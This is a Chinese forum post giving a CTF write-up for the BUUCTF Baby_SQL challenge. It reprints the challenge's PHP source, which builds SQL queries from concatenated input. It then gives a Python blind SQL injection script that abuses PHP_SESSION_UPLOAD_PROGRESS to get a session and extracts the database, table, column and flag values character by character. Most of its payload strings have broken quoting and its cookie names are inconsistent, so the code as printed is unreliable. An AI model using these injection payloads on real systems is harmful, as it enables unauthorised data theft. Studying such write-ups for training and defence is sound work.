qidao123.com技术社区-IT企服评测·应用市场»论坛 物联网/工业互联网 物联网 58,【8】BUUCTF [PwnThyBytes 2019]Baby_SQL1

58,【8】BUUCTF [PwnThyBytes 2019]Baby_SQL1

[复制链接]
发表于 2025-11-7 20:42:31 | 显示全部楼层 |阅读模式

进入靶场


和2次注入的页面很像
不外养成查察源代码的好风俗


先访问source.zip
下载后解压,发现两个文件

第一个文件夹打开又有4个PHP文件

那照旧先看index.php文件好了

有PHP和HTML两部门,下面是PHP部门代码(HTML太长了,先放一放)
  2. <?php
  3. // 启动会话
  4. session_start();
  6. // 对 $_SESSION 中的每个元素进行过滤处理
  7. foreach ($_SESSION as $key => $value): $_SESSION[$key] = filter($value); endforeach;
  8. // 对 $_GET 中的每个元素进行过滤处理
  9. foreach ($_GET as $key => $value): $_GET[$key] = filter($value); endforeach;
  10. // 对 $_POST 中的每个元素进行过滤处理
  11. foreach ($_POST as $key => $value): $_POST[$key] = filter($value); endforeach;
  12. // 对 $_REQUEST 中的每个元素进行过滤处理
  13. foreach ($_REQUEST as $key => $value): $_REQUEST[$key] = filter($value); endforeach;
  15. // 定义过滤函数
  16. function filter($value)
  17. {
  18.     // 如果值不是字符串,终止脚本并输出 Hacking attempt!
  19.    !is_string($value) AND die("Hacking attempt!");
  20.     // 使用 addslashes 函数对字符串进行转义,防止 SQL 注入
  21.     return addslashes($value);
  22. }
  24. // 如果满足以下条件,包含 templates/register.php 文件
  25. isset($_GET['p']) AND $_GET['p'] === "register" AND $_SERVER['REQUEST_METHOD'] === 'POST' AND isset($_POST['username']) AND isset($_POST['password']) AND @include('templates/register.php');
  26. // 如果满足以下条件,包含 templates/login.php 文件
  27. isset($_GET['p']) AND $_GET['p'] === "login" AND $_SERVER['REQUEST_METHOD'] === 'GET' AND isset($_GET['username']) AND isset($_GET['password']) AND @include('templates/login.php');
  28. // 如果满足以下条件,包含 templates/home.php 文件
  29. isset($_GET['p']) AND $_GET['p'] === "home" AND @include('templates/home.php');
  30. ?>
复制代码
对通过SESSION、GET、POST、REQUEST方法获取到的每个元素举行过滤处置惩罚,对字符串举行转义来防止SQL注入
看别的4个
db.php
  2. <?php
  4. $servername = $_ENV["DB_HOST"];
  5. $username = $_ENV["DB_USER"];
  6. $password = $_ENV["DB_PASSWORD"];
  7. $dbname = $_ENV["DB_NAME"];
  9. $con = new mysqli($servername, $username, $password, $dbname);
  11. ?>
复制代码
  2. <?php
  3. // 从环境变量中获取数据库的主机地址
  4. $servername = $_ENV["DB_HOST"];
  5. // 从环境变量中获取用于连接数据库的用户名
  6. $username = $_ENV["DB_USER"];
  7. // 从环境变量中获取连接数据库的密码
  8. $password = $_ENV["DB_PASSWORD"];
  9. // 从环境变量中获取要连接的数据库的名称
  10. $dbname = $_ENV["DB_NAME"];
  12. // 使用 mysqli 类创建一个新的数据库连接对象,将前面获取的主机地址、用户名、密码和数据库名称作为参数
  13. $con = new mysqli($servername, $username, $password, $dbname);
  14. ?>
复制代码
home.php
  2. <!DOCTYPE html>
  3. <html lang="en">
  4. <head>
  5.     <!-- 定义文档字符编码为 utf-8 -->
  6.     <meta charset="utf-8">
  7.     <!-- 告知搜索引擎不要索引此页面 -->
  8.     <meta name="robots" content="noindex">
  11.     <title>home</title>
  12.     <!-- 设置视口,以实现响应式布局 -->
  13.     <meta name="viewport" content="width=device-width, initial-scale=1">
  14.     <!-- 引入 Bootstrap 的 CSS 样式表 -->
  15.     <link href="//netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/css/bootstrap-combined.min.css" rel="stylesheet"
  16.           id="bootstrap-css">
  17.     <style type="text/css">
  18.     </style>
  19.     <!-- 引入 jQuery 库 -->
  20.     <script src="//code.jquery.com/jquery-1.10.2.min.js"></script>
  21.     <!-- 引入 Bootstrap 的 JavaScript 库 -->
  22.     <script src="//netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/js/bootstrap.min.js"></script>
  23. </head>
  24. <body>
  25. <div class="container">
  26.     <?php
  27.     // 包含数据库连接文件 db.php
  28.     include 'db.php';
  31.     // 判断是否设置了 $_SESSION["username"]
  32.     if (isset($_SESSION["username"])):
  33.         // 如果设置了 $_SESSION["username"],显示一个警告信息
  34.         die('<div class="alert alert-warning" id="msg-verify" role="alert"><strong>Hope this site is secure! I did my best to protect against some attacks. New sections will be available soon.</strong></div>');
  35.     else:
  36.         // 如果未设置 $_SESSION["username"],进行页面刷新,跳转到?p=login
  37.         die('<meta http-equiv="refresh" content="0; url=?p=login" />');
  38.     endif;
  39.    ?>
  40. </div>
  41. </body>
  42. </html>
复制代码
login.php
  2. <?php
  4. !isset($_SESSION) AND die("Direct access on this script is not allowed!");
  5. include 'db.php';
  7. $sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
  8. $result = $con->query($sql);
  10. function auth($user)
  11. {
  12.     $_SESSION['username'] = $user;
  13.     return True;
  14. }
  16. ($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
  18. ?>
复制代码
  2. <?php
  3. // 检查 $_SESSION 是否未被设置,如果未设置则终止脚本并输出错误信息,防止直接访问该脚本
  4. !isset($_SESSION) AND die("Direct access on this script is not allowed!");
  5. // 包含 db.php 文件,可能包含数据库连接等相关代码
  6. include 'db.php';
  8. // 构建 SQL 查询语句,从 `ptbctf`.`ptbctf` 表中查询用户名为 $_GET['username'] 且密码为 $_GET['password'] 的 MD5 加密值的用户信息
  9. $sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="'. $_GET['username']. '" and password="'. md5($_GET['password']). '";';
  10. // 执行 SQL 查询
  11. $result = $con->query($sql);
  13. // 定义 auth 函数,用于将用户信息存储在 $_SESSION 中并返回 True
  14. function auth($user)
  15. {
  16.     $_SESSION['username'] = $user;
  17.     return True;
  18. }
  20. // 以下是逻辑判断:
  21. // 如果查询结果行数大于 0,并且可以获取查询结果的一行数据,并且关闭数据库连接,并且调用 auth 函数存储用户信息,并且重定向到?p=home 页面,则执行成功;
  22. // 否则关闭数据库连接并输出 Try again!
  23. ($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
  24. ?>
复制代码
redister.php
  2. <?php
  4. !isset($_SESSION) AND die("Direct access on this script is not allowed!");
  5. include 'db.php';
  7. (preg_match('/(a|d|m|i|n)/', strtolower($_POST['username'])) OR strlen($_POST['username']) < 6 OR strlen($_POST['username']) > 10 OR !ctype_alnum($_POST['username'])) AND $con->close() AND die("Not allowed!");
  9. $sql = 'INSERT INTO `ptbctf`.`ptbctf` (`username`, `password`) VALUES ("' . $_POST['username'] . '","' . md5($_POST['password']) . '")';
  10. ($con->query($sql) === TRUE AND $con->close() AND die("The user was created successfully!")) OR ($con->close() AND die("Error!"));
  12. ?>
复制代码
  2. <?php
  3. // 检查 $_SESSION 是否未被设置,如果未设置则终止脚本并输出错误信息,防止直接访问该脚本
  4. !isset($_SESSION) AND die("Direct access on this script is not allowed!");
  5. // 包含 db.php 文件,可能包含数据库连接等相关代码
  6. include 'db.php';
  8. // 以下是对 $_POST['username'] 的验证:
  9. // 检查用户名是否包含字母 a、d、m、i、n 中的任何一个(不区分大小写),
  10. // 或者用户名长度小于 6,
  11. // 或者用户名长度大于 10,
  12. // 或者用户名不是字母数字组合
  13. // 如果满足上述任何一个条件,则关闭数据库连接并输出 "Not allowed!"
  14. (preg_match('/(a|d|m|i|n)/', strtolower($_POST['username'])) OR strlen($_POST['username']) < 6 OR strlen($_POST['username']) > 10 OR!ctype_alnum($_POST['username'])) AND $con->close() AND die("Not allowed!");
  16. // 构建 SQL 插入语句,将用户输入的用户名和密码(密码进行 MD5 加密)插入到 `ptbctf`.`ptbctf` 表中
  17. $sql = 'INSERT INTO `ptbctf`.`ptbctf` (`username`, `password`) VALUES ("'. $_POST['username']. '","'. md5($_POST['password']). '")';
  18. // 执行 SQL 插入操作,如果插入成功则关闭数据库连接并输出 "The user was created successfully!",否则关闭数据库连接并输出 "Error!"
  19. ($con->query($sql) === TRUE AND $con->close() AND die("The user was created successfully!")) OR ($con->close() AND die("Error!"));
  20. ?>
复制代码
根据代码信息绕过过滤机制
运行以下python脚本
  2. import requests
  3. import time
  5. url = "http://b9b081b9-90ad-4343-93d0-98dbc62e66d2.node5.buuoj.cn:81/templates/login.php"
  7. files = {"file": "123456789"}
  9. # 字段值
  10. flag = ''
  11. for i in range(1, 100):
  12.     low = 32
  13.     high = 127
  14.     mid = (low + high) // 2
  15.     while low < high:
  16.         time.sleep(0.06)
  17.         payload_flag = {
  18.             'username': f"test" or (ascii(substr((select group_concat(secret) from flag_tbl ),{i},1))>{mid}) #",
  19.             'password': 'test'
  20.         }
  21.         r = requests.post(url=url, params=payload_flag, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
  22.                           cookies={"PHPSESSID": "test1"})
  24.         if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
  25.             low = mid + 1
  26.         else:
  27.             high = mid
  28.         mid = (low + high) // 2
  29.     if mid == 32 or mid == 127:
  30.         break
  31.     flag += chr(mid)
  32.     print(flag)
  34. print(flag)
  36. # 列名
  37. column = ''
  38. for i in range(1, 100):
  39.     low = 32
  40.     high = 127
  41.     mid = (low + high) // 2
  42.     while low < high:
  43.         time.sleep(0.06)
  44.         payload_column = {
  45.             'username': f"test" or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag_tbl' ),{i},1))>{mid}) #",
  46.             'password': 'test'
  47.         }
  48.         r = requests.post(url=url, params=payload_column, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
  49.                           cookies={"PHP_SESSION_UPLOAD_PROGRESS": "test1"})
  51.         if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
  52.             low = mid + 1
  53.         else:
  54.             high = mid
  55.         mid = (low + high) // 2
  56.     if mid == 32 or mid == 127:
  57.         break
  58.     column += chr(mid)
  59.     print(column)
  61. print(column)
  63. # 表名
  64. table = ''
  65. for i in range(1, 100):
  66.     low = 32
  67.     high = 127
  68.     mid = (low + high) // 2
  69.     while low < high:
  70.         time.sleep(0.06)
  71.         payload_table = {
  72.             'username': f'test" or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ptbctf"),{i},1))>{mid}) #',
  73.             'password': 'test'
  74.         }
  75.         r = requests.post(url=url, params=payload_table, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
  76.                           cookies={"PHP_SESSION_UPLOAD_PROGRESS": "test1"})
  78.         if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
  79.             low = mid + 1
  80.         else:
  81.             high = mid
  82.         mid = (low + high) // 2
  83.     if mid == 32 or mid == 127:
  84.         break
  85.     table += chr(mid)
  86.     print(table)
  88. print(table)
  90. # 数据库名
  91. database = ''
  92. for i in range(1, 100):
  93.     low = 32
  94.     high = 127
  95.     mid = (low + high) // 2
  96.     while low < high:
  97.         time.sleep(0.06)
  98.         payload_database = {
  99.             'username': f"test" or (ascii(substr((select database()),{i},1))>{mid}) #",
  100.             'password': 'test'
  101.         }
  102.         r = requests.post(url=url, params=payload_database, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},
  103.                           cookies={"PHP_SESSION_UPLOAD_PROGRESS": "test1"})
  105.         if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:
  106.             low = mid + 1
  107.         else:
  108.             high = mid
  109.         mid = (low + high) // 2
  110.     if mid == 32 or mid == 127:
  111.         break
  112.     database += chr(mid)
  114. print(database)
复制代码



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

返回列表

络腮胡菲菲
+ 我要发帖
×
登录参与点评抽奖,加入IT实名职场社区
去登录
快速回复 返回顶部 返回列表